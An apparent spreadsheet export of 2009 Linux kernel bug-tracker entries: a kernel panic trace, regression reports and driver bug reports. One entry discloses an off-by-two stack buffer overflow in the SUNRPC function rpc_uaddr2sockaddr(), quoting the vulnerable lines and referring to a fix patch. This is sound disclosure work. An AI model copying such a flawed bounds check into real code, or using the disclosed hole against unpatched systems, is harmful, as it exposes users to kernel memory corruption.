CR3: 0000000001001000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffffffff81608000, task ffffffff81631440) Stack: ffffc90000003a60 0000000000000000 4598a105e74205c0 000000004598a101 &lt;0&gt; 000000000000050e ffff8807e74205c0 0000000000000003 0000000000000000 &lt;0&gt; ffffc90000003b40 ffffffff8141ae4a ffff8807e7420678 0000000000000000 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8141ae4a&gt;] tcp_ack+0x170a/0x1dd0 [&lt;ffffffff8141c362&gt;] tcp_rcv_state_process+0x122/0xab0 [&lt;ffffffff81422c6c&gt;] tcp_v4_do_rcv+0xac/0x220 [&lt;ffffffff813fd02f&gt;] ? nf_iterate+0x5f/0x90 [&lt;ffffffff81424b26&gt;] tcp_v4_rcv+0x586/0x6b0 [&lt;ffffffff813fd0c5&gt;] ? nf_hook_slow+0x65/0xf0 [&lt;ffffffff81406b70&gt;] ? ip_local_deliver_finish+0x0/0x120 [&lt;ffffffff81406bcf&gt;] ip_local_deliver_finish+0x5f/0x120 [&lt;ffffffff8140715b&gt;] ip_local_deliver+0x3b/0x90 [&lt;ffffffff81406971&gt;] ip_rcv_finish+0x141/0x340 [&lt;ffffffff8140701f&gt;] ip_rcv+0x24f/0x350 [&lt;ffffffff813e7ced&gt;] netif_receive_skb+0x20d/0x2f0 [&lt;ffffffff813e7e90&gt;] napi_skb_finish+0x40/0x50 [&lt;ffffffff813e82f4&gt;] napi_gro_receive+0x34/0x40 [&lt;ffffffff8133e0c8&gt;] e1000_receive_skb+0x48/0x60 [&lt;ffffffff81342342&gt;] e1000_clean_rx_irq+0xf2/0x330 [&lt;ffffffff813410a1&gt;] e1000_clean+0x81/0x2a0 [&lt;ffffffff81054ce1&gt;] ? ktime_get+0x11/0x50 [&lt;ffffffff813eaf1c&gt;] net_rx_action+0x9c/0x130 [&lt;ffffffff81046940&gt;] ? get_next_timer_interrupt+0x1d0/0x210 [&lt;ffffffff81041bd7&gt;] __do_softirq+0xb7/0x160 [&lt;ffffffff8100c27c&gt;] call_softirq+0x1c/0x30 [&lt;ffffffff8100e04d&gt;] do_softirq+0x3d/0x80 [&lt;ffffffff81041b0b&gt;] irq_exit+0x7b/0x90 [&lt;ffffffff8100d613&gt;] do_IRQ+0x73/0xe0 [&lt;ffffffff8100bb13&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff81296e6c&gt;] ? acpi_idle_enter_bm+0x245/0x271 [&lt;ffffffff81296e62&gt;] ? acpi_idle_enter_bm+0x23b/0x271 [&lt;ffffffff813c7a08&gt;] ? cpuidle_idle_call+0x98/0xf0 [&lt;ffffffff8100a104&gt;] ? cpu_idle+0x94/0xd0 [&lt;ffffffff81468db6&gt;] ? rest_init+0x66/0x70 [&lt;ffffffff816a082f&gt;] ? start_kernel+0x2ef/0x340 [&lt;ffffffff8169fd54&gt;] ? x86_64_start_reservations+0x84/0x90 [&lt;ffffffff8169fe32&gt;] ? x86_64_start_kernel+0xd2/0x100 Code: 00 eb 28 8b 83 d0 03 00 00 41 39 44 24 40 0f 89 00 01 00 00 41 0f b6 cd 41 bd 2f 00 00 00 83 e1 03 0f 84 fc 00 00 00 4d 8b 24 24 &lt;49&gt; 8b 04 24 4d 39 f4 0f 18 08 0f 84 d9 00 00 00 4c 3b a3 b8 01 RIP [&lt;ffffffff814203cc&gt;] tcp_xmit_retransmit_queue+0x8c/0x290 RSP &lt;ffffc90000003a40&gt; CR2: 0000000000000000 ---[ end trace d97d99c9ae1d52cc ]--- Kernel panic - not syncing: Fatal exception in interrupt Pid: 0, comm: swapper Tainted: G D 2.6.31 #2 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8103cab0&gt;] panic+0xa0/0x170 [&lt;ffffffff8100bb13&gt;] ? ret_from_intr+0x0/0xa [&lt;ffffffff8103c74e&gt;] ? print_oops_end_marker+0x1e/0x20 [&lt;ffffffff8100f38e&gt;] oops_end+0x9e/0xb0 [&lt;ffffffff81025b9a&gt;] no_context+0x15a/0x250 [&lt;ffffffff81025e2b&gt;] __bad_area_nosemaphore+0xdb/0x1c0 [&lt;ffffffff813e89e9&gt;] ? dev_hard_start_xmit+0x269/0x2f0 [&lt;ffffffff81025fae&gt;] bad_area_nosemaphore+0xe/0x10 [&lt;ffffffff8102639f&gt;] do_page_fault+0x17f/0x260 [&lt;ffffffff8147eadf&gt;] page_fault+0x1f/0x30 [&lt;ffffffff814203cc&gt;] ? tcp_xmit_retransmit_queue+0x8c/0x290 [&lt;ffffffff8141ae4a&gt;] tcp_ack+0x170a/0x1dd0 [&lt;ffffffff8141c362&gt;] tcp_rcv_state_process+0x122/0xab0 [&lt;ffffffff81422c6c&gt;] tcp_v4_do_rcv+0xac/0x220 [&lt;ffffffff813fd02f&gt;] ? nf_iterate+0x5f/0x90 [&lt;ffffffff81424b26&gt;] tcp_v4_rcv+0x586/0x6b0 [&lt;ffffffff813fd0c5&gt;] ? nf_hook_slow+0x65/0xf0 [&lt;ffffffff81406b70&gt;] ? ip_local_deliver_finish+0x0/0x120 [&lt;ffffffff81406bcf&gt;] ip_local_deliver_finish+0x5f/0x120 [&lt;ffffffff8140715b&gt;] ip_local_deliver+0x3b/0x90 [&lt;ffffffff81406971&gt;] ip_rcv_finish+0x141/0x340 [&lt;ffffffff8140701f&gt;] ip_rcv+0x24f/0x350 [&lt;ffffffff813e7ced&gt;] netif_receive_skb+0x20d/0x2f0 [&lt;ffffffff813e7e90&gt;] napi_skb_finish+0x40/0x50 [&lt;ffffffff813e82f4&gt;] napi_gro_receive+0x34/0x40 [&lt;ffffffff8133e0c8&gt;] e1000_receive_skb+0x48/0x60 [&lt;ffffffff81342342&gt;] e1000_clean_rx_irq+0xf2/0x330 [&lt;ffffffff813410a1&gt;] e1000_clean+0x81/0x2a0 [&lt;ffffffff81054ce1&gt;] ? ktime_get+0x11/0x50 [&lt;ffffffff813eaf1c&gt;] net_rx_action+0x9c/0x130 [&lt;ffffffff81046940&gt;] ? get_next_timer_interrupt+0x1d0/0x210 [&lt;ffffffff81041bd7&gt;] __do_softirq+0xb7/0x160 [&lt;ffffffff8100c27c&gt;] call_softirq+0x1c/0x30 [&lt;ffffffff8100e04d&gt;] do_softirq+0x3d/0x80 [&lt;ffffffff81041b0b&gt;] irq_exit+0x7b/0x90 [&lt;ffffffff8100d613&gt;] do_IRQ+0x73/0xe0 [&lt;ffffffff8100bb13&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff81296e6c&gt;] ? acpi_idle_enter_bm+0x245/0x271 [&lt;ffffffff81296e62&gt;] ? acpi_idle_enter_bm+0x23b/0x271 [&lt;ffffffff813c7a08&gt;] ? cpuidle_idle_call+0x98/0xf0 [&lt;ffffffff8100a104&gt;] ? cpu_idle+0x94/0xd0 [&lt;ffffffff81468db6&gt;] ? rest_init+0x66/0x70 [&lt;ffffffff816a082f&gt;] ? start_kernel+0x2ef/0x340 [&lt;ffffffff8169fd54&gt;] ? x86_64_start_reservations+0x84/0x90 [&lt;ffffffff8169fe32&gt;] ? x86_64_start_kernel+0xd2/0x100</t>
  </si>
  <si>
    <t>EXT4 corruption</t>
  </si>
  <si>
    <t>2009-10-26 16:52 UTC</t>
  </si>
  <si>
    <t>2009-11-17 22:31 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.32-rc4] + EXT4 corruption Submitter : Shawn Starr &lt;shawn.starr@rogers.com&gt; Date : 2009-10-13 2:07 References : http://marc.info/?l=linux-kernel&amp;m=125539997508256&amp;w=4 Handled-By : Theodore Tso &lt;tytso@mit.edu&gt; Notify-Also : Andy Lutomirski &lt;luto@mit.edu&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ATA related kernel warning after resume</t>
  </si>
  <si>
    <t>2009-10-26 16:55 UTC</t>
  </si>
  <si>
    <t>2009-10-28 18:31 UTC</t>
  </si>
  <si>
    <t>Subject : ATA related kernel warning after resume with 2.6.32-rc4 Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2009-10-14 6:55 References : http://marc.info/?l=linux-kernel&amp;m=125550466624678&amp;w=4 Notify-Also : Linux IDE &lt;linux-ide@vger.kernel.org&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>restorecond going crazy on 2.6.31.4 - inotify regression?</t>
  </si>
  <si>
    <t>2009-10-26 16:58 UTC</t>
  </si>
  <si>
    <t>2010-12-18 01:10 UTC</t>
  </si>
  <si>
    <t>Subject : restorecond going crazy on 2.6.31.4 - inotify regression? Submitter : Robert Hancock &lt;hancockrwd@gmail.com&gt; Date : 2009-10-16 0:03 References : http://marc.info/?l=linux-kernel&amp;m=125565159520489&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>possible circular locking dependency in ISDN PPP</t>
  </si>
  <si>
    <t>2009-10-26 17:22 UTC</t>
  </si>
  <si>
    <t>2009-10-26 22:07 UTC</t>
  </si>
  <si>
    <t>Subject : possible circular locking dependency in ISDN PPP Submitter : Tilman Schmidt &lt;tilman@imap.cc&gt; Date : 2009-10-18 22:16 References : http://marc.info/?l=linux-kernel&amp;m=125590423416087&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>umount blocked for more than 120 seconds after USB drive removal</t>
  </si>
  <si>
    <t>2009-10-26 17:48 UTC</t>
  </si>
  <si>
    <t>2009-11-21 15:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc4ish: task umount blocked for more than 120 seconds after USB drive removal Submitter : Robert Hancock &lt;hancockrwd@gmail.com&gt; Date : 2009-10-21 5:26 References : http://marc.info/?l=linux-kernel&amp;m=125610280532245&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/dcache.c:670 +lvm +md +ext3</t>
  </si>
  <si>
    <t>2009-10-26 17:57 UTC</t>
  </si>
  <si>
    <t>2010-02-07 23:07 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at fs/dcache.c:670 +lvm +md +ext3 (snapshots) Submitter : Alexander Clouter &lt;alex@digriz.org.uk&gt; Date : 2009-10-23 10:30 References : http://lkml.org/lkml/2009/10/23/50 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>System lockup running "cat /sys/kernel/debug/dri/0/i915_regs"</t>
  </si>
  <si>
    <t>2.6.32-rc5-git3</t>
  </si>
  <si>
    <t>2009-10-26 18:17 UTC</t>
  </si>
  <si>
    <t>2010-01-10 22:27 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc5-git3 -- System lockup running "cat /sys/kernel/debug/dri/0/i915_regs" Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2009-10-26 4:00 References : http://marc.info/?l=linux-kernel&amp;m=125652968117713&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PANIC: early exception 08 rip 246:10 error ffffffff810251b5 cr2 0</t>
  </si>
  <si>
    <t>2009-10-26 20:51 UTC</t>
  </si>
  <si>
    <t>2010-04-26 18:49 UTC</t>
  </si>
  <si>
    <t>Subject : PANIC: early exception 08 rip 246:10 error ffffffff810251b5 cr2 0 Submitter : "Justin P. Mattock" &lt;justinmattock@gmail.com&gt; Date : 2009-10-23 16:45 References : http://lkml.org/lkml/2009/10/23/252 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NFSv4 mount: Open,fork,Lock,Read: Read denied because it uses the OPEN state instead of the LOCK state</t>
  </si>
  <si>
    <t>2.6.29.4-167.fc11.i686</t>
  </si>
  <si>
    <t>2009-10-28 16:27 UTC</t>
  </si>
  <si>
    <t>2010-08-12 15:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 23561 [details] Source code to reproduce When a single process does open(), fcntl(F_SETLK), read(), the read operation uses the LOCK state and succeeds. However, if the process opens the file and then forks a child process, and the child process locks the file and reads it, the read operation is done with the OPEN state, and the server denies the file access. Attached is the source code I used, with comments for the configuration and network trace. Thanks for your help on this issue! Jean-Louis.</t>
  </si>
  <si>
    <t>ath9k leaks memory as function of traffic amount and forces reboot</t>
  </si>
  <si>
    <t>Linux version 2.6.30.9</t>
  </si>
  <si>
    <t>2009-10-28 23:07 UTC</t>
  </si>
  <si>
    <t>doddel</t>
  </si>
  <si>
    <t>2010-02-12 23:00 UTC</t>
  </si>
  <si>
    <t>Created attachment 23571 [details] debugfs entries before and after 350MB of wireless outbound traffic In station mode, regardless of encryption (tried 'none' and wpa-tkip), per 100 MB of wireless traffic about 10 kB of memory gets from free to unreclaimed. On my RouterStation (ar7161) with R52n miniPCI (ar9220), running OpenWrt trunk, this forces the kernel after about 350 MB of traffic to reboot. The same traffic routed between ethernet wired ports shows no leak. Ath9k in debug mode shows to my non-expert eyes no error messages in any of the reports. Have tried compilations with various compat-wireless packages until the 2009-10-27 one.</t>
  </si>
  <si>
    <t>intermittent hibernation problem again</t>
  </si>
  <si>
    <t>2009-10-28 23:49 UTC</t>
  </si>
  <si>
    <t>Ferenc Wágner</t>
  </si>
  <si>
    <t>2011-07-30 06:43 UTC</t>
  </si>
  <si>
    <t>Something similar to http://bugzilla.kernel.org/show_bug.cgi?id=13894 raised its ugly head again, please see my last comments on that bug. 2.6.32-rc5 feels particularly bad, with frequent failures to switch off the machine after "S|" or freezes after "Snapshotting system". The former does not cause much trouble in itself, as the machine can be switched off and resumed all right, but the latter is nasty. Suspend to RAM works all the time. The issue is not reproducible, unfortunately, and the kernel change happened almost together with a BIOS upgrade. Yesterday I switched back to 2.6.31 to see whether it still works stably with the new BIOS. I'll report back my findings in a couple of days.</t>
  </si>
  <si>
    <t>No sound with UDA134x sound driver</t>
  </si>
  <si>
    <t>2009-10-29 14:29 UTC</t>
  </si>
  <si>
    <t>Maksim Galemin</t>
  </si>
  <si>
    <t>2012-06-14 10:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 23581 [details] Patch with possible workaround for sound problem with UDA134x driver. There is no sound on 2.6.31 kernel with UDA134x driver. Sound is muted. After tracing hardware calls I found that on UDA134X driver loading during the kernel boot value 0x80 is written to the STATUS register (address 0x16) of the UDA1341 IC and according to the datasheet it means that ADC and DAC are both switched off. It happens in /sound/soc/soc-dapm.c file in function dapm_power_widgets (as you can see bias level always set to STANDBY mode): Code: /* If we just powered the last thing off drop to standby bias */ if (codec-&gt;bias_level == SND_SOC_BIAS_PREPARE &amp;&amp; !sys_power) { ret = snd_soc_dapm_set_bias_level(socdev, SND_SOC_BIAS_STANDBY); sys_power value is set in the same function: Code: /* Check which widgets we need to power and store them in * lists indicating if they should be powered up or down. */ list_for_each_entry(w, &amp;codec-&gt;dapm_widgets, list) { switch (w-&gt;id) { case snd_soc_dapm_pre: list_add_tail(&amp;codec-&gt;down_list, &amp;w-&gt;power_list); break; case snd_soc_dapm_post: list_add_tail(&amp;codec-&gt;up_list, &amp;w-&gt;power_list); break; default: if (!w-&gt;power_check) continue; power = w-&gt;power_check(w); if (power) sys_power = 1; As you can see to set sys_power to 1 we need to add widget to codec-&gt;dapm_widgets and initialize its power_check pointer. As a temporary hack I added dummy widget to the codec in /sound/soc/codecs/uda134x.c (id = snd_soc_dapm_vmid because function that adds new widget doesn't initialize power_check pointer for this id): Code: int uda134x_soc_dummy_power_check(struct snd_soc_dapm_widget *w) { return 1; } static const struct snd_soc_dapm_widget uda134x_dummy_dapm_widget = { .id = snd_soc_dapm_vmid, .power_check = uda134x_soc_dummy_power_check }; And in uda134x_soc_probe function before snd_soc_init_card I added: Code: snd_soc_dapm_new_controls(codec, &amp;uda134x_dummy_dapm_widget, 1); snd_soc_dapm_new_widgets(codec); This resolved the sound issue. Is it bug in driver? And if so is it a proper workaround to solve this issue? P.S. There is also bug in /sound/soc/codecs/uda134x.c file in function uda134x_mute: Shoul be: Code: uda134x_write(codec, UDA134X_DATA010, mute_reg); instead of Code: uda134x_write(codec, UDA134X_DATA010, mute_reg &amp; ~(1&lt;&lt;2)); Please find patch in attachment with possible workaround. Thanks.</t>
  </si>
  <si>
    <t>ath5k led don't work BenQ Joybook R55v</t>
  </si>
  <si>
    <t>Ubuntu 9.10 2.6.31-14</t>
  </si>
  <si>
    <t>2009-10-31 18:41 UTC</t>
  </si>
  <si>
    <t>nowymarluk</t>
  </si>
  <si>
    <t>2010-03-03 16:58 UTC</t>
  </si>
  <si>
    <t>recently I changed from madwifi driver to ath5k and now led don't work. In madwifi in order to turn on led I had to run following commands: sysctl -w dev.wifi0.ledpin=1 sysctl -w dev.wifi0.softled=1 but now it don't work, laptop: BenQ Joybook R55v lspci -vnn : 02:00.0 Ethernet controller [0200]: Atheros Communications Inc. AR5001 Wireless Network Adapter [168c:001c] (rev 01) Subsystem: Device [1a32:0100] Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at d8000000 (64-bit, non-prefetchable) [size=64K] Capabilities: &lt;access denied&gt; Kernel driver in use: ath5k Kernel modules: ath5k</t>
  </si>
  <si>
    <t>Memory corruption detected in low memory</t>
  </si>
  <si>
    <t>2009-11-03 04:17 UTC</t>
  </si>
  <si>
    <t>erki85</t>
  </si>
  <si>
    <t>2012-06-14 16:44 UTC</t>
  </si>
  <si>
    <t>When trying to run any game that uses hardware acceleration, they don't. Instead filesystem gets corrupted and there's no access to almost any application (for example ls reports, that there are no files in /usr/bin). After restart and fsck things go back to normal. In /var/log/kernel.log there are lots of Corrupted low memory at c0004efc (4efc phys) = 00ffffff messages and after these Nov 3 05:49:01 arch kernel: ------------[ cut here ]------------ Nov 3 05:49:01 arch kernel: WARNING: at arch/x86/kernel/check.c:134 check_for_bios_corruption+0xd2/0xe0() Nov 3 05:49:01 arch kernel: Hardware name: 23748TG Nov 3 05:49:01 arch kernel: Memory corruption detected in low memory Nov 3 05:49:01 arch kernel: Modules linked in: ipv6 ext2 fan snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device joydev snd_pcm_oss radeon ttm snd_intel8x0 snd_ac97_codec ac97_bus thinkpad_acpi pcmcia drm i2c_algo_bit snd_mixer_oss iTCO_wdt iTCO_vendor_support rfkill led_class nvram uhci_hcd ehci_hcd ppdev video output snd_pcm e1000 ipw2200 parport_pc battery psmouse sr_mod cdrom nsc_ircc snd_timer i2c_i801 snd soundcore floppy ac usbcore intel_agp agpgart libipw lib80211 snd_page_alloc i2c_core thermal serio_raw button yenta_socket rsrc_nonstatic pcmcia_core irtty_sir sir_dev sg evdev irda crc_ccitt shpchp pci_hotplug lp parport cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sd_mod ata_piix ata_generic pata_acpi libata scsi_mod Nov 3 05:49:01 arch kernel: Pid: 6, comm: events/0 Tainted: G W 2.6.31-ARCH #1 Nov 3 05:49:01 arch kernel: Call Trace: Nov 3 05:49:01 arch kernel: [&lt;c104654a&gt;] ? warn_slowpath_common+0x7a/0xc0 Nov 3 05:49:01 arch kernel: [&lt;c102a092&gt;] ? check_for_bios_corruption+0xd2/0xe0 Nov 3 05:49:01 arch kernel: [&lt;c1046607&gt;] ? warn_slowpath_fmt+0x37/0x60 Nov 3 05:49:01 arch kernel: [&lt;c102a092&gt;] ? check_for_bios_corruption+0xd2/0xe0 Nov 3 05:49:01 arch kernel: [&lt;c102a0a0&gt;] ? check_corruption+0x0/0x50 Nov 3 05:49:01 arch kernel: [&lt;c102a0b3&gt;] ? check_corruption+0x13/0x50 Nov 3 05:49:01 arch kernel: [&lt;c105d03f&gt;] ? worker_thread+0x11f/0x280 Nov 3 05:49:01 arch kernel: [&lt;c1062de0&gt;] ? autoremove_wake_function+0x0/0x60 Nov 3 05:49:01 arch kernel: [&lt;c105cf20&gt;] ? worker_thread+0x0/0x280 Nov 3 05:49:01 arch kernel: [&lt;c106298c&gt;] ? kthread+0x8c/0xa0 Nov 3 05:49:01 arch kernel: [&lt;c1062900&gt;] ? kthread+0x0/0xa0 Nov 3 05:49:01 arch kernel: [&lt;c10048e7&gt;] ? kernel_thread_helper+0x7/0x10 Nov 3 05:49:01 arch kernel: ---[ end trace a7919e7f17c0a727 ]--- system: Arch Linux, Thinkpad T42 with Radeon 7500 Xorg: 1.6.3.901 xf86-video-ati: 6.12.4</t>
  </si>
  <si>
    <t>Unable to associate with AP after resume since 2.6.32-rc6</t>
  </si>
  <si>
    <t>2.6.32-rc6</t>
  </si>
  <si>
    <t>2009-11-03 22:07 UTC</t>
  </si>
  <si>
    <t>2009-12-29 21:04 UTC</t>
  </si>
  <si>
    <t>Kernel version: 2.6.32-rc6 Last working kernel: 2.6.32-rc5 Athlon 64 3000 single core 64 bits version, Bluewhite64 After a suspend to ram/resume, the wireless interface is dead and cannot reassociate anymore. Trying to restart wpa/dhcpd gives the following errors: root@athor:/home/christian# /etc/rc.d/rc.inet1 stop root@athor:/home/christian# /etc/rc.d/rc.inet1 start SIOCSIFFLAGS: Erreur inconnue 132 /etc/rc.d/rc.inet1: eth1 information: 'Any ESSID' Error for wireless request "Set Nickname" (8B1C) : SET failed on device eth1 ; Operation not supported. SIOCSIFFLAGS: Unknown error 132 Could not set interface 'eth1' UP SIOCSIFFLAGS: Erreur inconnue 132 Polling for DHCP server on interface eth1: err, eth1: ioctl SIOCSIFFLAGS: Unknown error 132 The "Set Nickame" always occurs and is not the problem. However, the Unknown error 132 is completly new. Moreover, iwconfig says the eth1 interface is not associated anymore.</t>
  </si>
  <si>
    <t>getcwd() incorrectly returning ENOENT...</t>
  </si>
  <si>
    <t>2.6.30, 2.6.31, 2.6.32-rc5</t>
  </si>
  <si>
    <t>2009-11-04 09:28 UTC</t>
  </si>
  <si>
    <t>Since 2.6.30-rc, I've been experiencing various issues relating to getcwd() returning ENOENT on NFS4 clients. This looks to be racy and is readily reproducible [1]. I bisected the issue [2] and confirm that manually backing out this patch against 2.6.32-rc5 restores correct race-free behaviour. The issue did not occur with 2.6.29, so is a regression. To observe the change to user-level behaviour (after the reproducer commands): # make clean # strace -ffe getcwd make -n &gt;list [pid 3829] getcwd(0x7fffa269a380, 4096) = -1 ENOENT (No such file or directory) make: getcwd: No such file or directory -&gt; this impacts userspace and causes varying levels of failure, which often are benign, but can break applications, eg it's impossible to build an Ubuntu/Debian kernel over NFS4 since 2.6.30-rc. --- [1] booting eg: http://mira.sunsite.utk.edu/ubuntu-releases/karmic/ubuntu-9.10-desktop-amd64.iso $ sudo bash # apt-get install build-essential # apt-get build-dep apt # mount server:/ /mnt -tnfs4 &amp;&amp; cd /mnt # apt-get source apt # cd apt-0.7.23.1ubuntu2 # ./configure &amp;&amp; make -&gt; "getcwd: No such file or directory" messages observed with cited patch and not without --- [2] a65318bf3afc93ce49227e849d213799b072c5fd is first bad commit commit a65318bf3afc93ce49227e849d213799b072c5fd Author: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Date: Wed Mar 11 14:10:28 2009 -0400 NFSv4: Simplify some cache consistency post-op GETATTRs To observe the change to user-level behaviour (after the reproducer commands): # make clean # strace -ffe getcwd make -n &gt;list [pid 3829] getcwd(0x7fffa269a380, 4096) = -1 ENOENT (No such file or directory) make: getcwd: No such file or directory</t>
  </si>
  <si>
    <t>Bit 6 swizzle detection is broken on older i965 laptops</t>
  </si>
  <si>
    <t>2009-11-04 20:47 UTC</t>
  </si>
  <si>
    <t>Alan Hourihane</t>
  </si>
  <si>
    <t>2012-04-18 21:29 UTC</t>
  </si>
  <si>
    <t>It seems that the kernel gets the bit 6 swizzling wrong for some older i965 laptops. I've got a Dell Vostro 1700 and I've seen this also on a Dell D530 with the same behaviour and the code falls through to enabling... swizzle_x = I915_BIT_6_SWIZZLE_9_10; swizzle_y = I915_BIT_6_SWIZZLE_9; whereas it really should be... swizzle_x = I915_BIT_6_SWIZZLE_NONE; swizzle_y = I915_BIT_6_SWIZZLE_NONE; But I'm not sure given the current mechanism of detection what's the right way to fix it.</t>
  </si>
  <si>
    <t>Off-by-two stack buffer overflow in function rpc_uaddr2sockaddr() of net/sunrpc/addr.c</t>
  </si>
  <si>
    <t>2009-11-05 10:31 UTC</t>
  </si>
  <si>
    <t>Patroklos Argyroudis</t>
  </si>
  <si>
    <t>2009-11-20 17:02 UTC</t>
  </si>
  <si>
    <t>There is an off-by-two stack buffer overflow in function rpc_uaddr2sockaddr() of file net/sunrpc/addr.c in the Linux kernel SUNRPC implementation. The function rpc_uaddr2sockaddr() that is used to convert a universal address to a socket address takes as an argument the size_t variable uaddr_len (the length of the universal address string). The stack buffer buf is declared in line 315 to be of size RPCBIND_MAXUADDRLEN. If the passed argument uaddr_len is equal to RPCBIND_MAXUADDRLEN then the check at line 319 passes and then at lines 324 and 325 there are two out-of-bounds assignments: 319 if (uaddr_len &gt; sizeof(buf)) 320 return 0; ... 324 buf[uaddr_len] = '\n'; 325 buf[uaddr_len + 1] = '\0'; To fix it please see the attached patch.</t>
  </si>
  <si>
    <t>INFO: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2009-11-07 11:24 UTC</t>
  </si>
  <si>
    <t>Dariush Forouher</t>
  </si>
  <si>
    <t>2015-04-18 10:26 UTC</t>
  </si>
  <si>
    <t>Created attachment 23688 [details] kernel config Got this lockdep warning while putting my Dell Latitude D630 into the docking station (while it was running): No idea if this is really ACPI-related, bugzilla just asked me to put a label on it. cheers Dariush ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.32-rc6-00035-g8b17a4f #1 ------------------------------------------------------- kacpi_hotplug/246 is trying to acquire lock: (kacpid){+.+.+.}, at: [&lt;ffffffff8105bbd0&gt;] flush_workqueue+0x0/0xb0 but task is already holding lock: (&amp;dpc-&gt;work){+.+.+.}, at: [&lt;ffffffff8105abe9&gt;] worker_thread+0x189/0x310 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (&amp;dpc-&gt;work){+.+.+.}: [&lt;ffffffff8107382e&gt;] __lock_acquire+0x135e/0x1ce0 [&lt;ffffffff8107420c&gt;] lock_acquire+0x5c/0x80 [&lt;ffffffff8105ac35&gt;] worker_thread+0x1d5/0x310 [&lt;ffffffff8105f3a6&gt;] kthread+0x96/0xa0 [&lt;ffffffff8100c39a&gt;] child_rip+0xa/0x20 -&gt; #0 (kacpid){+.+.+.}: [&lt;ffffffff8107415d&gt;] __lock_acquire+0x1c8d/0x1ce0 [&lt;ffffffff8107420c&gt;] lock_acquire+0x5c/0x80 [&lt;ffffffff8105bc1e&gt;] flush_workqueue+0x4e/0xb0 [&lt;ffffffff812dfe59&gt;] acpi_os_wait_events_complete+0x10/0x1e [&lt;ffffffff812dfe84&gt;] acpi_os_execute_deferred+0x1d/0x31 [&lt;ffffffff8105ac3b&gt;] worker_thread+0x1db/0x310 [&lt;ffffffff8105f3a6&gt;] kthread+0x96/0xa0 [&lt;ffffffff8100c39a&gt;] child_rip+0xa/0x20 other info that might help us debug this: 2 locks held by kacpi_hotplug/246: #0: (kacpi_hotplug){+.+...}, at: [&lt;ffffffff8105abe9&gt;] worker_thread+0x189/0x310 #1: (&amp;dpc-&gt;work){+.+.+.}, at: [&lt;ffffffff8105abe9&gt;] worker_thread+0x189/0x310 stack backtrace: Pid: 246, comm: kacpi_hotplug Not tainted 2.6.32-rc6-00035-g8b17a4f #1 Call Trace: [&lt;ffffffff81071e60&gt;] print_circular_bug+0x100/0x110 [&lt;ffffffff8107415d&gt;] __lock_acquire+0x1c8d/0x1ce0 [&lt;ffffffff810701bb&gt;] ? add_lock_to_list+0x5b/0xe0 [&lt;ffffffff810738ca&gt;] ? __lock_acquire+0x13fa/0x1ce0 [&lt;ffffffff810715ed&gt;] ? trace_hardirqs_on_caller+0x14d/0x1a0 [&lt;ffffffff810410df&gt;] ? finish_task_switch+0x6f/0x100 [&lt;ffffffff812dfe67&gt;] ? acpi_os_execute_deferred+0x0/0x31 [&lt;ffffffff8107420c&gt;] lock_acquire+0x5c/0x80 [&lt;ffffffff8105bbd0&gt;] ? flush_workqueue+0x0/0xb0 [&lt;ffffffff8105bc1e&gt;] flush_workqueue+0x4e/0xb0 [&lt;ffffffff8105bbd0&gt;] ? flush_workqueue+0x0/0xb0 [&lt;ffffffff812dfe59&gt;] acpi_os_wait_events_complete+0x10/0x1e [&lt;ffffffff812dfe84&gt;] acpi_os_execute_deferred+0x1d/0x31 [&lt;ffffffff8105ac3b&gt;] worker_thread+0x1db/0x310 [&lt;ffffffff8105abe9&gt;] ? worker_thread+0x189/0x310 [&lt;ffffffff8104396f&gt;] ? try_to_wake_up+0xaf/0x220 [&lt;ffffffff8105f720&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff8107164d&gt;] ? trace_hardirqs_on+0xd/0x10 [&lt;ffffffff8105aa60&gt;] ? worker_thread+0x0/0x310 [&lt;ffffffff8105f3a6&gt;] kthread+0x96/0xa0 [&lt;ffffffff8100c39a&gt;] child_rip+0xa/0x20 [&lt;ffffffff8100bd3c&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff8105f310&gt;] ? kthread+0x0/0xa0 [&lt;ffffffff8100c390&gt;] ? child_rip+0x0/0x20 ACPI: \_SB_.PCI0.PCIE.GDCK - docking</t>
  </si>
  <si>
    <t>2.6.30.9: OOPS on nfs server shutdown</t>
  </si>
